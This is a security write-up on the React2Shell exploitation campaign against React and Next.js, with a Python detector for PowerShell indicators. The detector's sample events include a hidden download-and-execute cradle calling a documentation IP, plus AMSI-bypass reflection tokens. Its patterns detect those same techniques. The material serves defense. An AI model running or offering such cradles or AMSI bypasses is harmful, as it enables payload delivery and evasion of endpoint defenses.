
React2Shell targets front‑line code that runs with production privileges, providing attackers a direct route to full system compromise. The campaign’s scale and reliance on cloud infrastructure mean any unpatched React or Next.js deployment exposes enterprises to massive, automated breach risk.
The React2Shell flaw lies in the RSC "Flight" protocol that underpins modern React Server Components and the Next.js framework. Because the protocol sits at the edge of application logic, a successful remote code execution runs with the same privileges as the production service, effectively handing attackers full control. The vulnerability’s discovery in late 2025 coincided with rapid adoption of server‑side rendering, which made a large swath of web applications vulnerable at once and prompted a swift response from security researchers.
GreyNoise’s telemetry reveals an unprecedented scale: more than 8.1 million exploit attempts, 8,163 distinct source IPs, and activity across 101 nations. Cloud providers, especially AWS, dominate the infrastructure, supplying over a third of the malicious traffic and illustrating how attackers use elastic, low‑cost compute to rotate IPs and evade static blocklists. The diversity of JA4H and JA4T fingerprints, along with roughly 70,000 unique payloads, signals a highly automated, bot‑driven operation that can adapt quickly to defensive measures, turning the exploit into a commodity component of broader attack kits.
Defenders must act decisively. Immediately upgrading to the React and Next.js releases that address CVE‑2025‑55182 is the most effective mitigation, complemented by dynamic blocklists that ingest GreyNoise’s real‑time feed to block churned IP ranges. Endpoint monitoring should focus on PowerShell execution with encoded commands, DownloadString usage, and the specific AMSI‑bypass reflection patterns observed. By coupling rapid patch deployment with robust telemetry and logging, organizations can contain the current wave and reduce exposure to future automated exploit campaigns targeting the React ecosystem.
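The three endpoint indicators named above (encoded PowerShell commands, DownloadString cradles, and reflection into the AMSI class) can be triaged from process-creation telemetry. The following is an added example written for this page, not code from the article or from GreyNoise: it assumes process-creation events (Sysmon event 1 or Windows 4688 style) exported as dicts with a `CommandLine` field, decodes `-EncodedCommand` blobs (PowerShell base64-encodes UTF-16LE text) so that indicators hidden inside the encoded layer are also inspected, and runs over three constructed sample events. Field names, the sample command lines and the 203.0.113.5 address are all constructed for the example.

```python
"""Triage PowerShell process-creation events for the indicators named above.

Added example for this page, not code from the article or from GreyNoise.
Assumes process-creation events (Sysmon event 1 / Windows 4688 style) as dicts
with 'id', 'Image' and 'CommandLine' fields; all sample events are constructed.
"""
import base64
import re

# Encoded-command switch: PowerShell accepts any unambiguous prefix of
# -EncodedCommand (-e, -ec, -enc, ...). We require a base64-looking argument of
# at least 16 characters so that e.g. "-ExecutionPolicy Bypass" does not match.
ENCODED_SWITCH = re.compile(r"(?i)(?:^|\s)-e[a-z]*\s+([A-Za-z0-9+/=]{16,})")

# Download cradle: the .NET WebClient method named in the article.
DOWNLOAD_CRADLE = re.compile(r"(?i)\.DownloadString\s*\(")

# Reflection into the AMSI class: the token "amsi" together with one of the
# .NET reflection calls used to reach private members.
REFLECTION_TOKENS = ("gettype", "getfield", "setvalue")


def decode_encoded_command(blob):
    """Decode a PowerShell -EncodedCommand blob (base64 over UTF-16LE).

    Returns the script text, or None if the blob is not valid base64/UTF-16LE.
    """
    try:
        raw = base64.b64decode(blob, validate=True)
        return raw.decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def analyze_command_line(cmdline):
    """Return indicator flags for one command line, plus the decoded script if any."""
    findings = {"encoded_command": False, "download_string": False,
                "amsi_reflection": False, "decoded": None}
    text = cmdline  # text to inspect: outer command line plus any decoded layer
    match = ENCODED_SWITCH.search(cmdline)
    if match:
        findings["encoded_command"] = True
        decoded = decode_encoded_command(match.group(1))
        if decoded is not None:
            findings["decoded"] = decoded
            text = cmdline + "\n" + decoded
    if DOWNLOAD_CRADLE.search(text):
        findings["download_string"] = True
    low = text.lower()
    if "amsi" in low and any(tok in low for tok in REFLECTION_TOKENS):
        findings["amsi_reflection"] = True
    return findings


def triage(events):
    """Return (event id, [indicator names]) for every event with at least one hit."""
    hits = []
    for ev in events:
        f = analyze_command_line(ev["CommandLine"])
        names = [k for k in ("encoded_command", "download_string", "amsi_reflection") if f[k]]
        if names:
            hits.append((ev["id"], names))
    return hits


def _encode(script):
    """Build a -EncodedCommand argument the way PowerShell expects it (constructed sample)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample events. Event 1 hides a DownloadString cradle inside an
# encoded command (203.0.113.5 is a documentation address). Event 2 reflects
# into the AMSI class; the body is elided and only the tokens the detector keys
# on are kept. Event 3 is a benign scheduled script.
SAMPLE_EVENTS = [
    {"id": 1, "Image": POWERSHELL,
     "CommandLine": "powershell.exe -NoProfile -WindowStyle Hidden -enc "
                    + _encode("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/stage.ps1')")},
    {"id": 2, "Image": POWERSHELL,
     "CommandLine": "powershell.exe -nop -c \"...GetType('System.Management.Automation.AmsiUtils').GetField(...)\""},
    {"id": 3, "Image": POWERSHELL,
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
]

if __name__ == "__main__":
    for event_id, indicators in triage(SAMPLE_EVENTS):
        print(f"event {event_id}: {', '.join(indicators)}")
```

The decoding step matters more than the regexes: an encoded command line carries none of the plain-text indicators, so a detector that only inspects the outer command line misses the DownloadString in event 1. In a SIEM this logic maps to two rules, one on the encoded-command switch (high volume, enrich by decoding) and one on DownloadString or AMSI reflection in either layer (alert).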